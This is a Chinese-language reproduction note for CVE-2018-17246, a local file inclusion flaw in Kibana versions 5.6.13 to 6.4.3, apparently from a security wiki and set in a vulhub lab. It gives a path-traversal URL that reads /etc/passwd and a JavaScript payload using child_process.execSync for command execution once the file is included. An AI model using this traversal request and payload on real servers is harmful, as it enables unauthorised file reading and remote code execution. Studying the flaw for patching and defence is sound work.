menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 074-kibana chevron_right 002-CVE-2018-17246 Kibana Local File Inclusion.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    002-CVE-2018-17246 Kibana Local File Inclusion.md
    1.31 KB / 2021-07-17 00:01:22
        # CVE-2018-17246 Kibana Local File Inclusion
    
    ## 一、漏洞简介
    
    Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.13到6.4.3之间的版本存在一处文件包含漏洞,通过这个漏洞攻击者可以包含任意服务器上的文件。此时,如果攻击者可以上传一个文件到服务器任意位置,即可执行代码。
    
    ## 二、漏洞影响
    
    Kibana 5.6.13到6.4.3
    
    ## 三、复现过程
    
    直接访问如下URL,来包含文件`/etc/passwd`:
    
    ```
    http://www.baidu,com:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
    
    ```
    
    虽然在返回的数据包里只能查看到一个500的错误信息,但是我们通过执行`docker-compose logs`即可发现,`/etc/passwd`已经成功被包含:
    
    ![1.png](images/2020_06_13/63812827eb634b4a8d11ef7bf3e3d1ee.png)
    
    所以,我们需要从其他途径往服务器上上传代码,再进行包含从而执行任意命令。比如,我们将如下代码上传到服务器的`/tmp/vulhub.js`:
    
    ```bash
    // docker-compose exec kibana bash && echo '...code...' > /tmp/vulhub.js
    export default {asJson: function() {return require("child_process").execSync("id").toString()}}
    
    ```
    
    成功包含并返回命令执行结果:
    
    ![2.png](images/2020_06_13/bf39216f27204c8db0c30b594e61e983.png)
    
    
    
    links
    file_download